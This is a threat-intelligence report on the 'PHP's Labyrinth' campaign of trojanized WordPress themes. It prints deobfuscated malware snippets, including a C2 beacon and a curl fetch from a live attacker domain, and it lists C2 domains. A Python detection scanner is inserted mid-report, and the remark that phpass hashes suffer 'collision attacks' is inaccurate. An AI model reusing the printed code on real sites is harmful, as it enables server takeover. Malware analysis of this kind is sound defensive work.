PHP’s Labyrinth – Weaponized WordPress Themes & Plugins

19 February 2020


Prevailion’s Tailored Intelligence team has followed an active supply chain attack that has been ongoing since late 2017; we named this campaign “PHP’s Labyrinth.” In this operation, threat actors have surreptitiously installed malicious files into a large number of premium WordPress themes and plugins. We assess that the responsible party chose to target WordPress because it makes up 60% of all content management systems and 34% of all websites on the internet. WordPress themes and plugins allow the average person to quickly and easily create a website through “drag and drop” features, rather than coding an entire website themselves.

The nefarious actor took advantage of the increased demand for premium themes and distributed trojanized copies to end-users through specific WordPress marketplace platforms. These marketplace platforms were created by the threat actor; we were able to discover 30 different platforms used to distribute the trojanized themes and plugins. Three of the most popular webpages on these platforms were:

  • “Ultimate Support Chat” with approximately 700k views
  • “Woocomerence Product filter” with approximately 175k views
  • “Slider Revolution v5.4.8.1” with approximately 125k views.

Thus far Prevailion has identified over 20k actively compromised web servers worldwide that are displaying evidence of compromise. This data is currently available on the Prevailion Apex platform. Based upon the number of views from the malicious platforms, we speculate that the total number of infected web servers is likely much higher, potentially in the hundreds of thousands. Due to the pandemic nature of this threat, Prevailion coordinated its efforts on this campaign with the appropriate U.S. law enforcement agencies.

The attack commences when an unsuspecting victim uploads a trojanized theme to their web server. References to those trojanized files date back to Stack Overflow posts from October 2017. Once all the malicious files are downloaded, the threat actor gains full control over the web server, allowing them to add an administrative account and recover the web admin’s email account and WordPress password hash. If the password was recovered from the hash and was used for multiple accounts, it could allow access to corporate resources.

In most cases we assess that the web servers ultimately became part of the Propeller Ads advertising network. Additional research shows that the Propeller Ads network has been associated with a plethora of malicious activity from different threat actors, including but not limited to malvertising and the Fallout exploit kit. This ad network is manipulated by attackers to become the contagion vector, allowing threat actors to remotely post malicious ads on otherwise benign websites. The malicious ads run JavaScript files and surreptitiously install malware on victimized machines. If successful, this technique could allow the threat actor to steal usernames, passwords, and private files from victims’ computers.

WordPress Malware

PHP’s Labyrinth Campaign Walk Through

Infection source

The Prevailion team has identified 30 platforms that served trojanized WordPress themes. The most prominent websites appeared to be called The website description states that they offer “Thousands of free nulled, [a.k.a. pirated] WordPress Themes and Plugins.” When analyzing this cluster of WordPress platforms we observed a number of irregularities that lead us to believe they were fictitious and managed by the same entity. For instance, sites had broken links to social media icons that took the visitor right back to the homepage; furthermore, all the suspicious websites appeared to use the same template.

Screenshot of and website

To supplement this claim: in at least one instance the threat actor created the domain null24[.]icu, whose page header reads Nulledzip[.]download, which is one of the other websites. That domain, nulledzip[.]download, was also flagged in a Digital Millennium Copyright Act takedown notice that can be found here.

Based on our analysis, we identified 30 websites that correlate to this cluster.



The “class.theme-module.php” or “class.plugin-modules.php” file is the operative file that was added to all the trojanized themes. The threat actor added functionality that allows the command and control node to be changed to a “newdomain” periodically. The next function obtains a “$wp_auth_key” from one of the 1st stage C2s. It then writes the content fetched from the 1st stage C2’s code.php URL to a file called “wp-tmp.php”. The malware performs host-based reconnaissance and attempts to enumerate the following directories:

upload, uploads, img, administrator, admin, Bin, cache, wp-admin, cli, components, includes, language, layouts, libraries, logs, wp-content, media, modules, plugins, tmp, upgrade, engine, templates, wp-includes, template, Images, Css, js, image, file, files

Next it checks whether certain files, such as post.php and wp-vcd.php, exist; if not, it creates them on the system. It then copies the “WP_CD_Code” function to “wp-vcd.php”. This is the file that seems to have drawn the most attention over the past few years and has been mentioned on WordPress web forums. The wp-vcd.php file receives the malicious code copied from the “class.theme-modules.php” file discussed above.

Then it scans for a file named functions; if that file exists it runs “file_get_contents” against the 1st stage C2, passing the HTTP_HOST, password and install hash.

One such GET request would look like this: {MD5hash}

The previously described code then repeats the process and iterates over two other domains with different generic top-level domains (gTLDs). We suspect that these domains serve as backup communications channels in case an issue arises with the primary domain. An example of the three URLs used in the December campaign were:

  • hxxp://www.vrilns[.]com/code[.]php
  • hxxp://www.vrilns[.]pw/code[.]php
  • hxxp://www.vrilns[.]top/code[.]php

Once the code creates the new wp-vcd.php file, it then deletes the file class.theme-module.php.

In this section we’ll examine the three files that were previously made by the loader script. Note that some of the files will be discussed throughout the report; in this section we show the files as they appear after the loader module was run once.

Newly Observed Shift in Tactics

We observed the threat actor altering their tactics, techniques and procedures (TTPs) starting in late December 2019, after a report detailing aspects of this activity was published by another security firm. The most recent threat actor domain registered was frilns[.]com, which used Alidns (Alibaba Cloud DNS) instead of Cloudflare. The threat actor also no longer relied upon Cloudflare hosting services and seemingly moved all the domains to a single IP address, 94[.]156[.]175[.]170. One more change is that the threat actor removed the secondary and tertiary communications channels during the December 2019 to January 2020 timeframe.

1st Stage

At this point we see the threat actor taking action from their 1st stage server, adding code to the existing files on the compromised machine. One modified file was functions.php; the threat actor added a line of code to the top of this file that would run the wp-vcd.php file. The next file modified was wp-tmp.php, which, as mentioned above, contains a WP_AUTH_Key. It was here that we took note of two additional sections of code.

The first section downloads additional code from a 1st stage C2 and adds it to the top of functions.php. An example of this:

$file  = file_get_contents(get_template_directory() . '/functions.php');   // parent theme
$filec = file_get_contents(get_stylesheet_directory() . '/functions.php'); // child theme
$rep  = ""; // search string (empty in the sample as reproduced here)
$repw = ""; // replacement string (empty in the sample as reproduced here)
if (stripos($file, $rep) !== false) {
    $new_file = str_replace($rep, $repw, $file);
    @file_put_contents(get_template_directory() . '/functions.php', $new_file);
}
if (stripos($filec, $rep) !== false) {
    $new_filec = str_replace($rep, $repw, $filec);
    @file_put_contents(get_stylesheet_directory() . '/functions.php', $new_filec);
}

The second section of code adds a persistent cookie called “wordpress_cf_adm_use_adm” to anyone who visits the website – however the cookie would only be added to users who came to the website from one of the following search engines:

  • Google
  • Yahoo
  • Yandex
  • MSN
  • Baidu
  • Bing
  • DoubleClick

The cookie includes the referring search engine as well as a reference to the compromised domain that was visited, and is set to persist for 1000 days. Once the cookie was attached to the end-user, their IP address is added to a list kept in the file “wp-feed.php.” The threat actor’s code appears to be a slight modification of code found on another WordPress forum that discussed how to target visitors arriving at your site from search engines.

New Administrative Account

In order to ensure continued access to the infected websites, the threat actor also added an administrative account. This account allows them to simply log back into the website (with administrative privileges) at any time to alter any files. There was one variant of this malware reported by Astra where the threat actor would create the username “wpadmin”. More recent reporting from Medium indicated that the threat actor kept this feature but switched to a different username, “100010010”.

2nd Stage


We came back to the functions.php file to analyze the new code added during the last step. The new segment of code sets the max upload and post size to 128 Megabytes. It also specified that if the code took longer than 600 seconds to execute, it should stop. We hypothesize that these features were added to ensure their activity was not detected, as a hung process would be more likely to cause problems and be investigated by a responder.

@ini_set('upload_max_size', '128M');    // note: not a real PHP directive (upload_max_filesize is), so this call has no effect
@ini_set('post_max_size', '128M');
@ini_set('max_execution_time', '600');  // abort if the script runs longer than 600 seconds

Next it obtains the IP address, bot number, pack and user-agent string of the compromised machine and sends them to a threat actor controlled C2.

// Beacon to the 2nd stage C2; implode("", $hoho) assembles the C2 host (hxxp://dolodos[.]top in this sample)
$result = get_url(implode("", $hoho) . "/logs/dolodos.php?url=" . urlencode("http://" . $server_host . $_SERVER["REQUEST_URI"])
    . "&ref=" . urlencode(@$_SERVER["HTTP_REFERER"]) . "&ip=" . checked_ip()
    . "&bot=$bot_num&pck=$pck&uagent=" . urlencode($_SERVER["HTTP_USER_AGENT"]));

// Fetch the currently active redirect domain from the C2 and cache it locally
system("chmod 755 $red_domain_path;curl -s http://piasuna[.]gdn/gen/actual_domain_my.php?pck=$pck | base64 > $red_domain_path");

After identifying the URL pattern we were able to find another live C2 domain through Google, vosmas[.]icu/gen/actual_domain_my.php?pck=ip8.

Google Search for the URL path found in the deobfuscated functions.php file

Through these efforts we identified a further set of 2nd stage domains.


One notable aspect: some of these domains, such as medsource[.]top, simply contain instructions that redirect the output to tdreg[.]icu. We therefore suspect that some of the domains act as relays for the tdreg[.]icu domain.

Below this code there was another copy of the “WP_CD_Code” code that was referenced in the loader section of this report. We believe the threat actor copied this code to numerous files as a secondary means of persistence: in the event that one file is deleted by the systems administrator, they retain access to the compromised WordPress domain.
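As an added example (not Prevailion’s tooling and not code from the samples), the following Python triage script walks a WordPress install and flags the file names and code strings that the loader, 1st stage and 2nd stage sections above attribute to this malware. The fixture it builds, the theme directory names and the file contents are constructed for the demonstration.

```python
"""Triage scanner for the wp-vcd / PHP's Labyrinth artifacts described in this report.
Added example: not Prevailion's tooling and not code taken from the malware samples."""
import os
import re
import tempfile

# File names the report says the loader drops or rewrites inside theme/plugin directories.
DROPPED_FILES = {
    "class.theme-modules.php", "class.theme-module.php", "class.plugin-modules.php",
    "wp-vcd.php", "wp-tmp.php", "wp-feed.php",
}

# Strings quoted in the report from the deobfuscated 1st and 2nd stage code (matched case-insensitively).
CONTENT_SIGNATURES = {
    "wp_cd_code": "WP_CD_Code persistence function",
    "wp_auth_key": "1st stage wp_auth_key handling",
    "wordpress_cf_adm_use_adm": "search-engine visitor tagging cookie",
    "upload_max_size": "ini_set block injected into functions.php",
    "actual_domain_my.php": "2nd stage C2 domain-rotation path",
    "dolodos.php": "2nd stage beacon path",
}

# functions.php is modified by prepending a line that includes one of the dropped files.
LOADER_INCLUDE_RE = re.compile(
    r"(include|require)(_once)?[^;]*(wp-vcd|class\.theme-modules?|class\.plugin-modules)\.php",
    re.IGNORECASE,
)


def scan_file(path):
    """Return a list of (path, reason) findings for one PHP file."""
    findings = []
    name = os.path.basename(path)
    if name in DROPPED_FILES:
        findings.append((path, "dropped file name"))
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return findings
    if name == "functions.php" and LOADER_INCLUDE_RE.search(text):
        findings.append((path, "functions.php includes dropped loader"))
    lowered = text.lower()
    for needle, reason in CONTENT_SIGNATURES.items():
        if needle in lowered:
            findings.append((path, reason))
    return findings


def scan_tree(root):
    """Walk a WordPress install and collect findings from every .php file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.endswith(".php"):
                findings.extend(scan_file(os.path.join(dirpath, fname)))
    return sorted(findings)


def build_fixture():
    """Constructed sample install: one clean theme and one trojanized theme (hypothetical names)."""
    root = tempfile.mkdtemp(prefix="wp_triage_")
    clean = os.path.join(root, "wp-content", "themes", "clean-theme")
    bad = os.path.join(root, "wp-content", "themes", "nulled-theme")
    os.makedirs(clean)
    os.makedirs(bad)
    with open(os.path.join(clean, "functions.php"), "w") as fh:
        fh.write("<?php\nadd_theme_support('title-tag');\n")
    with open(os.path.join(bad, "functions.php"), "w") as fh:
        # Prepended include line plus the ini_set block shown in the 2nd stage section.
        fh.write("<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) "
                 "include_once(dirname(__FILE__) . '/wp-vcd.php'); ?>\n"
                 "<?php\n@ini_set('upload_max_size', '128M');\n")
    with open(os.path.join(bad, "wp-vcd.php"), "w") as fh:
        fh.write("<?php\nfunction WP_CD_Code() { /* constructed stand-in body */ }\n")
    return root


if __name__ == "__main__":
    for path, reason in scan_tree(build_fixture()):
        print(f"{reason}: {path}")
```

Point scan_tree at a real document root to triage a suspect install; a hit on a dropped file name or on an include of one from functions.php is the strongest signal, the content strings are corroborating.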

Wp-tmp.php – Search Engine Optimization (SEO) component

This group calculated all the angles when it came to manipulating searches. Another calculated effort was to raise the Search Engine Optimization (SEO) profile of the sites they controlled, creating a cost-effective means to draw more “clicks” and using that leverage to proliferate. To accomplish this, they run a series of commands on the compromised websites in order to enumerate the individual site. This was implemented as three command cases:

  • case 'get_all_links'
  • case 'set_id_links'
  • case 'create_page'

The first command obtains a list of the posts on a compromised WordPress site. The second command allows the attacker to add web links to existing web pages. The third command enables them to create new web pages on the compromised domain. In one file, the threat actor added links to one of their own marketplaces, offering their premium nulled themes. This was likely done to raise the SEO of these websites, ensuring they get more downloads and ultimately more infections.

The functionality in this section appeared to closely mirror code found on another Stack Overflow post, where the incident responder claimed to find the snippet saved in the file “post.php.” This is where the attackers can also add “keywords” to make the website more popular, likely in an attempt to raise the website’s profile so it could display more ads. As noted by other researchers in previous reporting, this aspect of the campaign utilized the domain *.spekt[.]pw. The advertising component will be explained in the section below.

Ad-Blocker Script

In more recent versions of wp-tmp.php, there was a PHP script that served as an anti-adblocker and was used through at least September 2019. This allows the website to display ads on the visited webpage even if the end-user was using a program such as “Ad-Blocker”. Based upon lexicon analysis of the code found in the sample, the script appeared to be a slightly modified version of PHP code found on this web forum post from 2017.

Javascript – Advertising network

After the ad-blocker code, there is a line for a function called “slider_option” used to make asynchronous requests to two JavaScript files hosted on remote servers. These hostnames correspond to the advertising service Propeller Ads. Propeller Ads is an online ad service where various end users can bid to have their ads displayed on an otherwise benign website. While this has become a standard marketing technique, unfortunately it can also be abused by threat actors with more nefarious intentions. In order to ensure the correct person receives the advertisement revenue for displaying the ads, the accounts are identified by their zoneid.

A copy of the JavaScript used to invoke the ads is displayed below:

<script async="async" type="text/javascript" src="//"></script>

<script src="//" data-cfasync="false" async></script>

Propeller Ad Network

Generating Money through Advertisements 

Once the WordPress website was compromised, the threat actor appeared to be interested in generating revenue through the Propeller Ads network. While the Propeller Ads network presents itself like any other ad network, it has a history of being used by criminal organizations for malicious purposes. Its extensive history of run-ins with various computer security firms resulted in an article being written about these activities by TechTarget in 2017.


Malvertising is when threat actors are able to display malicious ads and run remote JavaScript files on otherwise benign websites. Cisco wrote a comprehensive report on advertising and malvertising last year that explains the marketing aspects of how paid advertising works. For those who are unfamiliar, the client chooses a plan and pays:

  • Every time the advertisement is shown (pay per impression)
  • Every time the advertisement is clicked (pay per click)
  • Every time the advertisement is shown, clicked, and something is ordered from the website (pay per order)

During the course of our investigation we visited a compromised domain and got the following URL. We have removed the domain and cep string from the URL to avoid identifying the victim.


From this example, we determined that the threat actor was receiving half a cent every time someone clicked on the advertisement. In numerous cases, the advertisements were completely benign and would direct the end user to a legitimate service or website. In other cases, however, we observed pop-up ads prompting the user to download potentially unwanted programs (PUPs), sometimes called adware. These redirections could occur from a user clicking on a box to “allow notifications” or in some cases just clicking URLs embedded within the website. In one instance, we clicked on the “about us” link and received a pop-up like the one below.

“Flash Player Update” Malvertising for Windows 10 machines from uniqueapps[.]app

In other cases the advertisements don’t look like advertisements at all, and mimic “Software Updates”.

“Software Update” Malvertising for OSX machines from tharbadir[.]com

If an end user clicks on the pop-up advertisement, it could install the potentially unwanted program on their local machine. Once on the local machine, these programs can continue to redirect the victim’s web browser to certain websites or even download additional malware from the internet.

Fallout Exploit Kit

The Nao Security Twitter account stated that they observed Propeller Ads redirect victims to domains associated with the Fallout Exploit Kit.

Image created by Nao Security and posted on Twitter, showing propellerads.php redirecting to an exploit kit

In addition to the screenshot above, other security firms such as FireEye have previously noted the Fallout Exploit Kit being propagated to victims through advertising networks. They noted that the victim would likely be served either a malvertising pop-up, similar to those in the previous section, or connected to the exploit kit based upon the browser profile from the user-agent string and potentially the location of the victim. If the browser was successfully exploited by the kit, Viriback noted that it appeared to drop a variant of Zloader. The Zloader agent has historically been used to download additional payloads.

Compromise Intelligence Details

Once Prevailion was able to identify the command and control nodes associated with this particular campaign, we collected the associated telemetry information. We then cleaned the data using proprietary algorithms, thereby reducing bias and the rate of false positives. This refined data is called Evidence of Compromise (EoC), which allows us to create a global contagion snapshot representing a portion of impacted organizations. The map below denotes organizations that present EoC associated with PHP’s Labyrinth compromised web servers.

Prevailion Global Contagion Snapshot of EoC.

Based upon our telemetry, affected organizations are spread across a multitude of countries and sectors. As is typical with supply chain attacks, there was no clear targeting of any one individual sector, and so the resulting contagion map shows victimology that reflects largely upon the popularity of WordPress. Based upon our findings, we identified that small to medium sized businesses accounted for more than a fifth of all compromised entities, as they are the primary customers of premium third-party themes. This is most likely due to the fact that many lack the necessary funding or human capital to build a completely custom website, unlike larger, more established firms.

Additionally, we identified a number of more prominent victims, including but not limited to:

  • A decentralized crypto-mining website
  • A U.S. based stock trading firm
  • A small U.S. based bank
  • A government run petro/chemical organization
  • A U.S. based insurance company
  • A large U.S. based manufacturer
  • A U.S. payment card solution organization
  • A U.S. based IT services organization

While compromises of smaller third parties may first appear a nuisance, these instances can actually become quite dangerous later on down the road. Larger organizations typically have more money to invest in their cyber defense programs, so it becomes much easier to launch a campaign through a supply chain vendor, than it would be to directly attempt to infect a larger corporation. If left undetected, threat actors can use these initial infections to pivot, and affect larger organizations through their smaller, less defended third parties.


In order to protect against the WordPress malware, we recommend against using any pirated, a.k.a. nulled, software. Organizations should instead utilize either open-source software or pay for premium themes. If your organization’s web server is running a Windows-based operating system, we recommend enabling and updating Windows Defender.

The default WordPress passwords are stored in their current state as a hybrid of MD5 hashes and phpass, which are proven vulnerable to collision attacks. Through recovery of the username and MD5 hash, an attacker could find a collision offline to facilitate access to the organization’s corporate network. This emphasizes the problem of password reuse, which has plagued the industry. When configuring any WordPress website, we encourage web administrators to use more secure hashing algorithms and to never reuse passwords across multiple accounts.

In order to curtail the threat posed to end-users visiting these compromised websites, we recommend using a plugin like NoScript that prevents remote JavaScript from running on your machine. We also recommend updating to the latest operating system and web browser. This could help protect against certain exploit kits, which are known to target outdated web browsers. If you click on a malvertising ad, we recommend scanning your computer with an up-to-date version of antivirus to minimize the impact of the threat.


While the problem of compromised websites is not new, it will continue to plague end users, administrators, and the internet as a whole. As WordPress becomes even more prominent, it is an ever more appealing target for attackers. To make matters worse, all end-users need to do is download one malicious theme or even one plugin to compromise the integrity of the entire web server. In one instance we observed a verified ThemeForest purchaser ask questions on support forums about the malicious files, even including references to one of the command and control domains. We then downloaded that same theme but did not see any malicious files, and suspect the end user likely downloaded a plugin from a malicious platform in conjunction with the ThemeForest theme.

At this time, the threat actor seems content with generating revenue off the advertising aspect of this campaign; however, we cannot ignore the fact that in its present state it has metastasized into a massive botnet, with all the potential issues that represents. This could also have far-reaching impact, as it gives other criminals a platform to perform malvertising and use various exploit kits to amplify their reach. We assess that by exposing and countering this activity we can impact both this threat actor and the other criminals who use these compromised sites as a platform to exploit end-users, producing a ripple effect that makes everyone safer.

We believe that this campaign was able to continue for so long due to the placement of these web servers. Similar to the VPNFilter malware, these web servers are typically located outside of the company’s standard perimeter. Many of these web servers are running without anti-virus software and are rarely checked except for when they go offline. This unique combination makes them an ideal target for attackers, and we expect continued targeting of web servers and WordPress-related software to remain a serious threat to network defenders.
